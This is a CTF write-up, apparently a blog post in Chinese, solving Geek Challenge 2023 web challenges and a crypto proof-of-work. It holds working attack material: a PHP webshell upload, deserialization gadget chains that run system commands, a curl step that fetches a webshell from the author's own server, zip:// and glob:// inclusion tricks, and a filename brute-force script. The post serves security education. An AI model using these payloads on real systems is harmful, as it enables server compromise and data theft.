0
点赞
收藏
分享

微信扫一扫

极客挑战2023部分wp

web

ezhttp

极客挑战2023部分wp_CTF

easy_php

POST /?syc=welcome%20to%20GEEK%202023!&lover=2e4 HTTP/2
Host: sdjmytlkvr9c2362p1nccahfa.node.game.sycsec.com
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1320

qw=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&yxx=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&SYC[GEEK.2023=Happy to see you!

unsign

<?php
class syc
{
    public $cuit;
    public function __destruct()
    {
        echo("action!<br>");
        $function=$this->cuit;
        return $function();
    }
}

class lover
{
    public $yxx;
    public $QW;
    public function __invoke()
    {
        echo("invoke!<br>");
        return $this->yxx->QW;
    }

}

class web
{
    public $eva1;
    public $interesting;

    public function __get($var)
    {
        echo("get!<br>");
        $eva1=$this->eva1;
        $eva1($this->interesting);
    }
}


$re=new syc();
$re->cuit=new lover();
$re->cuit->yxx=new web();
$re->cuit->yxx->eva1='system';
$re->cuit->yxx->interesting='cat /flag';
echo serialize($re);

url=O:3:"syc":1:{s:4:"cuit";O:5:"lover":2:{s:3:"yxx";O:3:"web":2:{s:4:"eva1";s:6:"system";s:11:"interesting";s:9:"cat /flag";}s:2:"QW";N;}}

n00b_Upload

POST /upload_file.php HTTP/2
Host: cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com
Content-Length: 315
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqmJNVHRgdkJ76BDI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://cifulezceoeal4ygzuxw06dj5.node.game.sycsec.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

------WebKitFormBoundaryqmJNVHRgdkJ76BDI
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg

GIF89a
<?=eval($_POST['cmd']);?>
------WebKitFormBoundaryqmJNVHRgdkJ76BDI
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryqmJNVHRgdkJ76BDI--

curl

服务器上准备一个一句话马,然后开一个http服务,因为不能有冒号,所以开80端口

极客挑战2023部分wp_CTF_02

GIF89a
<?=eval($_POST['cmd']);?>

使用curl命令下载到环境里,另存为1.php

addr=-o 1.php xx.xxx.xxx.xxx/shell.php

然后访问

https://qbwtun5kbud0kg20s9fbp7p4f.node.game.sycsec.com/1.php


cmd=system('cat /tmp/Syclover');

极客挑战2023部分wp_php_03

famale_imp_l0ve

一道文件包含,用到了zip协议,主要是题目限制了包含文件的后缀时使用

<?php
  //o2takuXX师傅说有问题,忘看了。
  header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
$file = $_GET['file'];
if(isset($file) && strtolower(substr($file, -4)) == ".jpg"){
  include($file);
}
  ?>

准备一个压缩包,压缩包的内容是一个cmd.jpg文件,然后文件内容是一句话马,然后压缩成zip文件

极客挑战2023部分wp_极客挑战2023_04

然后通过网站上传之后,用zip协议进行文件包含

https://w0co1yvttngpnhutm4avlaczb.node.game.sycsec.com/include.php?file=zip://upload/1cmd.jpg.zip%23cmd.jpg

极客挑战2023部分wp_极客挑战2023_05

Pupyy_rce

<?php
  highlight_file(__FILE__);
header('Content-Type: text/html; charset=utf-8');
error_reporting(0);
include(flag.php);
//当前目录下有好康的😋
if (isset($_GET['var']) && $_GET['var']) {
  $var = $_GET['var'];

  if (!preg_match("/env|var|session|header/i", $var,$match)) {
    if (';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $var)){
      eval($_GET['var']);
    }
    else die("WAF!!");
  } else{
    die("PLZ DONT HCAK ME😅");
  }
}

这道题考点还是无参数RCE吧

print_r(scandir(getcwd()));获取一下当前路径下的文件

极客挑战2023部分wp_CTF_06

发现flag文件在数组的第四个位置,倒数第五个位置,用数组逆向也不太好操作,又把var和session、header给ban了,看了看对数组的一些操作 array_rand这个函数可以随机返回一个数组的键名

极客挑战2023部分wp_php_07

这里已经是得到了flag文件名对应的键了 array_flip这个函数可以交换键值,所以配合array_rand函数就可以获得flag文件名了

极客挑战2023部分wp_php_08

这就好说了,直接show_source,试几次就试到了flag文件

极客挑战2023部分wp_极客挑战2023_09

payload

show_source(array_rand(array_flip(scandir(getcwd()))));

ez_remove

<?php
highlight_file(__FILE__);
class syc{
    public $lover;
    public function __destruct()
    {
        eval($this->lover);
    }
}

if(isset($_GET['web'])){
    if(!preg_match('/lover/i',$_GET['web'])){
        $a=unserialize($_GET['web']);
        throw new Error("快来玩快来玩~");
    }
    else{
        echo("nonono");
    }
}
?>

这道题首先用到了GC垃圾回收机制绕过throw new Error,然后是用十六进制绕过对lover的过滤,最后是用蚁剑绕过phpinfo里的disable_function。 先上exp

<?php

class syc{
    public $lover;
    public function __destruct()
    {
        eval($this->lover);
    }
}




$a=new syc();
$a->lover="eval(\$_POST[1]);";

$b=array($a,0);
echo serialize($b);

运行得到

a:2:{i:0;O:3:"syc":1:{s:5:"lover";s:16:"eval($_POST[1]);";}i:1;i:0;}

把结尾的i:1;i:0;换成i:0;i:0;导致GC产生,然后用\6c\6f\76\65\72替换lover绕过正则,最后蚁剑连接就好,记得把https换成http,根目录下有一个f1ger文件,base64 f1ger就出来了

Akane!

php的一个反序列化题目

<?php
error_reporting(0);
show_source(__FILE__);
class Hoshino
{
    public $Ruby;
    private $Aquamarine;

    public function __destruct()
    {
        $this->Ruby->func();
    }
}

class Idol
{
    public $Akane;

    public function __wakeup()
    {
        $this->Akane = '/var/www/html/The************************.php';
    }

    public function __call($method,$args)
    {
        $Kana = count(scandir($this->Akane));
        if ($Kana > 0) {
            die('Kurokawa Akane');
        } else {
            die('Arima Kana');
        }
    }
}

$a = unserialize(base64_decode($_GET['tuizi']));

?>

看了一下,考点一个是wakeup函数的绕过,一个是glob协议爆破文件名,然后scandir函数的返回值是一个数组,利用数组的长度判断字符是否正确 先写一个序列化的demo

<?php
class Hoshino
{
    public $Ruby;
    public $Aquamarine;

    public function __destruct()
    {
        $this->Ruby->func();
    }
}

class Idol
{
    public $Akane;

    public function __wakeup()
    {
        $this->Akane = '/var/www/html/The************************.php';
    }

    public function __call($method,$args)
    {
        $Kana = count(scandir($this->Akane));
        if ($Kana > 0) {
            die('Kurokawa Akane');
        } else {
            die('Arima Kana');
        }
    }
}



$a = new Hoshino();
$a->Ruby=new Idol();
$a->Ruby->Akane='glob:///var/www/html/';
$a2=serialize($a);
$b=str_replace(":2:",":3:",$a2);
echo($b)."\n";
echo base64_encode($b);

//O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:21:"glob:///var/www/html/";}s:10:"Aquamarine";N;}
//Tzo3OiJIb3NoaW5vIjozOntzOjQ6IlJ1YnkiO086NDoiSWRvbCI6MTp7czo1OiJBa2FuZSI7czoyMToiZ2xvYjovLy92YXIvd3d3L2h0bWwvIjt9czoxMDoiQXF1YW1hcmluZSI7Tjt9

得到字符串后用python写脚本

import requests
import string
import base64


s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789."

filename = "The"
url = "https://b5q90mpuhbnc7n6u7k0g73glp.node.game.sycsec.com/"
for num in range(1,50):
    for i in s:
        print(num)
        print(i)
        payload = 'O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:'+str(25+num)+':"glob:///var/www/html/'+filename+i+'*";}s:10:"Aquamarine";N;}'
        print(payload)
        parm='?tuizi='+base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        print(parm)
        r = requests.get(url=url+parm)
        if "Kurokawa Akane" in r.text:
            filename += i
            print(num, filename)
            break

这样直接运行就可以爆破出文件名,我这里直接循环次数写的50,懒得数题目里的*号了,爆破结果在过程中能看到

极客挑战2023部分wp_极客挑战2023_10

文件名:TheS4crEtF1AgFi1EByo2takuXX.php

极客挑战2023部分wp_极客挑战2023_11

得到flag SYC{QW410zJgUiSg9oclaL}

crypto

week1

proof_of_work

import hashlib

s='mjpIZCsijFpQtaSv'
m = '6c327a60bb4beeea04b037e2c6ec50201be9a9c15351040dae09369717c18263'

def revmd5():
    for i in range(33,127):
        for j in range(33, 127):
            for k in range(33, 127):
                for l in range(33,127):
                    a =chr(i)+chr(j)+chr(k)+chr(l)+s
                    ha = hashlib.sha256(a.encode()).hexdigest()
                    # print(ha)
                    # print(a)

                    if (ha == m):
                        print(a)
                        print(ha)
                        print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
                        break;
revmd5()

举报

相关推荐

0 条评论